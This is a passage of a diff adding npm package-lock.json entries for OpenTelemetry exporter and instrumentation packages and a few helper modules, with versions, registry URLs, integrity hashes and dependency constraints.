"https://registry.npmjs.org/@opentelemetry/exporter-jaeger/-/exporter-jaeger-1.15.2.tgz", + "integrity": "sha512-BwYd5836GYvuiQcF4l5X0ca09jGJr/F37MMGyz94VH0b1dp0uYBwRJw2CQh56RlVZEdpKv29JyDRVZ/4UrRgLQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2", + "jaeger-client": "^3.15.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-grpc": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-grpc/-/exporter-trace-otlp-grpc-0.41.2.tgz", + "integrity": "sha512-tRM/mq7PFj7mXCws5ICMVp/rmgU93JvZdoLE0uLj4tugNz231u2ZgeRYXulBjdeHM88ZQSsWTJMu2mvr/3JV1A==", + "dependencies": { + "@grpc/grpc-js": "^1.7.1", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-grpc-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-grpc/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-http": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-http/-/exporter-trace-otlp-http-0.41.2.tgz", + "integrity": "sha512-Y0fGLipjZXLMelWtlS1/MDtrPxf25oM408KukRdkN31a1MEFo4h/ZkNwS7ZfmqHGUa+4rWRt2bi6JBiqy7Ytgw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-http/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-proto": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-proto/-/exporter-trace-otlp-proto-0.41.2.tgz", + "integrity": "sha512-IGZga9IIckqYE3IpRE9FO9G5umabObIrChlXUHYpMJtDgx797dsb3qXCvLeuAwB+HoB8NsEZstlzmLnoa6/HmA==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "@opentelemetry/otlp-proto-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-proto/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-zipkin": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-zipkin/-/exporter-zipkin-1.15.2.tgz", + "integrity": "sha512-j9dPe8tyx4KqIqJAfZ/LCYfkF9+ggsT0V1+bVg9ZKTBNcLf5dTsTMdcxUxc/9s599kgcn6UERnti/tozbzwa6Q==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/instrumentation": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation/-/instrumentation-0.41.2.tgz", + "integrity": "sha512-rxU72E0pKNH6ae2w5+xgVYZLzc5mlxAbGzF4shxMVK8YC2QQsfN38B2GPbj0jvrKWWNUElfclQ+YTykkNg/grw==", + "dependencies": { + "@types/shimmer": "^1.0.2", + "import-in-the-middle": "1.4.2", + "require-in-the-middle": "^7.1.1", + "semver": "^7.5.1", + "shimmer": "^1.2.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-amqplib": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-amqplib/-/instrumentation-amqplib-0.33.1.tgz", + "integrity": "sha512-Eg797WDHVDcRr6+5tihh7ab+ZjS5yCOoW4PkUYCcJHVT31AGfi+PlkLgHknW+uT1oKijMC4D1p6jDa/2rzRv/g==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-aws-lambda": { + "version": "0.37.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-aws-lambda/-/instrumentation-aws-lambda-0.37.0.tgz", + "integrity": "sha512-jGXW3iQhs/g9ckq2zbk16o3+LKBhZv96Ghhh2IomxLMm4aNTZgoVMgw6mdwtXxmjcpJoG0K1HK4amxSMLV/mUA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/propagator-aws-xray": "^1.3.1", + "@opentelemetry/resources": "^1.8.0", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/aws-lambda": "8.10.119" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-aws-sdk": { + "version": "0.36.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-aws-sdk/-/instrumentation-aws-sdk-0.36.0.tgz", + "integrity": "sha512-I7lOeAxjH9GZbmsqf5YnxwD9btliHHQztySgq2gO2P3zF0Wzd75rBEexbHcIyo/YoQiKpfcWfiNGw9NWgJPleQ==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/propagation-utils": "^0.30.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-bunyan": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-bunyan/-/instrumentation-bunyan-0.32.1.tgz", + "integrity": "sha512-TjH357ldA5DpK09XUDWffqV9Km++N9H0dwmxHrElM2TSe4Usgkgw6mlodbuh45hoVDD+cCPi+GO6Dq1QLVEdZg==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@types/bunyan": "1.8.8" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-cassandra-driver": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-cassandra-driver/-/instrumentation-cassandra-driver-0.33.1.tgz", + "integrity": "sha512-nn8XtLB1XmViEAnNnZ43jHojYxgNJ1W+QF2B3yBmfVqXJnE0IbzhIiPmU+Zx3ZSzIoWS0EQQM3ljcgDC03FZ7A==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-connect": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-connect/-/instrumentation-connect-0.32.1.tgz", + "integrity": "sha512-QHi0hTXtqZj3wSyvKwFmkGYHRnGdl8w76MHZj3Rekxe4ILpcn78fZGJSbA+0eYdOWHnGP0c483uMOeGH08XYmA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/connect": "3.4.35" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-cucumber": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-cucumber/-/instrumentation-cucumber-0.1.0.tgz", + "integrity": "sha512-xSJBLKSjdBWzT8mYgsEt0RW9i0gBPRDh/lL9WXjTv7E1SMWyVAxMLURV+KfVmRjRltwlgXi+/j70dY+k88Q5ZA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dataloader": { + "version": "0.5.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-dataloader/-/instrumentation-dataloader-0.5.1.tgz", + "integrity": "sha512-dqYITnlCo7FSZ8mhyxh9TtogwcebGcuMaXTjYDyIKGshDcjCxhvhNjFDe4y3RD/g/EFKINkYVkVXB1lDqZdxTA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dns": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-dns/-/instrumentation-dns-0.32.2.tgz", + "integrity": "sha512-6KNN35ot/qyOQN0jh/+9mGCFeWM40fhcJWgg82D0syuxQq2YaUvyGLw6FAi7f0xxaeOPLCQxSK5wL9jTn3KF2g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "semver": "^7.5.4" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/instrumentation-express": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-express/-/instrumentation-express-0.33.1.tgz", + "integrity": "sha512-awrpiTZWnLOCJ4TeDMTrs6/gH/oXbNipoPx3WUKQlA1yfMlpNynqokTyCYv1n10Zu9Y2P/nIhoNnUw0ywp61nA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/express": "4.17.17" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-fastify": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-fastify/-/instrumentation-fastify-0.32.2.tgz", + "integrity": "sha512-DKa7SgxTtZ0O1ngGtAdwr/g8XguYw6KvLNME+J8rt6QpWQM+xytS0bg4atZAyt6aeYr/kO1sMrGXSlHEEYWIhg==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-fs": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-fs/-/instrumentation-fs-0.8.1.tgz", + "integrity": "sha512-a5U6ydfqVeT4Zp6GL5lZDZNJAmic3CCtgg/f2yqvnpq2fE0cyD/XlW9JWzGhAJaq29E1bxtb9FJ0n6ee3c9dYQ==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-generic-pool": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-generic-pool/-/instrumentation-generic-pool-0.32.2.tgz", + "integrity": "sha512-HMAkKOfSZMKy4YfDLwSByR2q74pk3TMpSxgwWYLeezNpscnNAc4mtZtbWdUL62v8IaCXIc/qizwQYkcKqvGnZQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-graphql": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-graphql/-/instrumentation-graphql-0.35.1.tgz", + "integrity": "sha512-bAM4W5wU0lZ1UIKK/5b4p8LEU8N6W+VgpcnUIK7GTTDxdhcWTd3Q6oyS6nauhZSzEnAEmmJVXaLQAGIU4sEkyA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-grpc": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-grpc/-/instrumentation-grpc-0.41.2.tgz", + "integrity": "sha512-+fh9GUFv97p25CMreUv4OdP5L21hPgfX3d4fuQ0KIgIZIaX2M6/8cr5Ik+8zWsyhYzfFX3CKq6BXm3UBg7cswQ==", + "dependencies": { + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-hapi": { + "version": "0.33.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-hapi/-/instrumentation-hapi-0.33.0.tgz", + "integrity": "sha512-c+I/25OrovuSdeb/OQIZIVTSiatTcH+KE8Nna0xAnwaG4H7Q7eoGet7IBPzNTbunXY9Xt77oFVsN1TMeXeDktg==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/hapi__hapi": "20.0.13" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-http": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-http/-/instrumentation-http-0.41.2.tgz", + "integrity": "sha512-dzOC6xkfK0LM6Dzo91aInLdSbdIzKA0IgSDnyLi6YZ0Z7c1bfrFncFx/3gZs8vi+KXLALgfMlpzE7IYDW/cM3A==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/semantic-conventions": "1.15.2", + "semver": "^7.5.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-http/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-http/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-http/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/instrumentation-ioredis": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-ioredis/-/instrumentation-ioredis-0.35.1.tgz", + "integrity": "sha512-lixraoS9rs81783QRjQ56/S5KzVBllC+zs7UJuTGODi5Egn/YMGp5lNnlbkUxeJl9LMyADMiP7ZGpQtfKwdc3g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/ioredis4": "npm:@types/ioredis@^4.28.10" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-knex": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-knex/-/instrumentation-knex-0.32.1.tgz", + "integrity": "sha512-s+5BtsYUendDTrWAxkr50X3+kb+sVffFzp4z5DC+aZt52P/kF85wm6GyC1mREvvhhK2UKrCq2yMVKD90z0FKsA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-koa": { + "version": "0.36.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-koa/-/instrumentation-koa-0.36.0.tgz", + "integrity": "sha512-4VRvaFeLAnxG+BQr7pZyWyjsM6RdPWkrwsgZTLFYdI1yTpePoyParfz04vJKPMW55ZJ749g15K2dUy6gVUV41Q==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/koa": "2.13.8", + "@types/koa__router": "8.0.11" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-lru-memoizer": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-lru-memoizer/-/instrumentation-lru-memoizer-0.33.1.tgz", + "integrity": "sha512-1FFOlGTEigMWppEkv7o+IyeyWTXXpFAfmcFjJRph5m88RsotgzPLCnxaSeS0GMU7E8UJplusNmmsnu7jPJ2YqA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-memcached": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-memcached/-/instrumentation-memcached-0.32.1.tgz", + "integrity": "sha512-laolY41/k6KHYnBQrWpnMlEK49/g8/OQBtvSiPdHiF46wW3eWpXmaTGMRksrRGUtyE+VMRhf7WIDRUYLZULP1g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/memcached": "^2.2.6" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mongodb": { + "version": "0.37.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mongodb/-/instrumentation-mongodb-0.37.0.tgz", + "integrity": "sha512-Fwuwf7Fsx/F3QXtU6hbxU4D6DtT33YkAr0+fjtR7qTEcAU0YOxCZfy4tlX2jxjxR1ze8tKfaAWhXBxXwLMWT3g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/sdk-metrics": "^1.9.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mongoose": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mongoose/-/instrumentation-mongoose-0.33.1.tgz", + "integrity": "sha512-IzYcEZSmlaOlkyACt8gTl0z3eEQafxzEAt/+W+FdNBiUdm81qpVx/1bpzJwSgIsgcLf27Dl5WsPmrSAi4+Bcng==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14.0" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mysql": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mysql/-/instrumentation-mysql-0.34.1.tgz", + "integrity": "sha512-zQq7hN3ILm1vIJCGeKHRc4pTK8LOmkTt8oKWf0v+whFs7axieIhXZMoCqIBm6BigLy3Trg5iaKyuSrx7kO6q2g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/mysql": "2.15.21" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-mysql2": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-mysql2/-/instrumentation-mysql2-0.34.1.tgz", + "integrity": "sha512-SPwgLI2H+gH+GP7b5cWQlFqO/7UeHvw6ZzFKxwLr4vy8wmxYF4aBMLc8qVO8bdXFHd114v0IzOIAvpG6sl/zYQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@opentelemetry/sql-common": "^0.40.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-nestjs-core": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-nestjs-core/-/instrumentation-nestjs-core-0.33.1.tgz", + "integrity": "sha512-Y5Khvp8ODA6TuDcZKAc63cYDeeZAA/n0ceF0pcVCJwA2NBeD0hmTrCJXES2cvt7wVbHV/SYCu7OpYDQkNjbBWw==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-net": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-net/-/instrumentation-net-0.32.1.tgz", + "integrity": "sha512-r9YC8fFDi+B/JiNfMn+vJaOpgdA83bQM3u4mW9mJi2hAI/LcvjJYPx4aTRLWAPSd/HRG/Olzdvx5LdWvzL8LHg==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-pg": { + "version": "0.36.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-pg/-/instrumentation-pg-0.36.1.tgz", + "integrity": "sha512-k8L7RSRTQ6e+DbHEXZB8Tmf/efkQnWKeClpZb3TEdb34Pvme4PmcpG2zb6JtM99nNrshNlVDLCZ90U3xDneTbw==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@opentelemetry/sql-common": "^0.40.0", + "@types/pg": "8.6.1", + "@types/pg-pool": "2.0.3" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-pino": { + "version": "0.34.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-pino/-/instrumentation-pino-0.34.1.tgz", + "integrity": "sha512-/FW/wxTshwwmiSE8KgVoWvfjxz5omKBdDbP0McKZk84V02lwwJk0m7+kc2cSOed5rk7iprpZolwO8a8AFVanNA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-redis": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-redis/-/instrumentation-redis-0.35.1.tgz", + "integrity": "sha512-zY7eTzGyJCMX/0o04Q9yLy7gllf7Zh4s+g7Kv1d2cMLtTt9zGSlncqj49uNCnneywnpMNRUIwcmd+Ch1bQeh+g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/redis-common": "^0.36.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-redis-4": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-redis-4/-/instrumentation-redis-4-0.35.1.tgz", + "integrity": "sha512-tQ07wvtjUbHSvvhPPvWyZjYTSzVBTpC746ro5szLnniodvxtKkmP/N+R9KyFXfyH7wwaLIR1Scgq3XSGSppt+Q==", + "dependencies": { + "@opentelemetry/instrumentation": 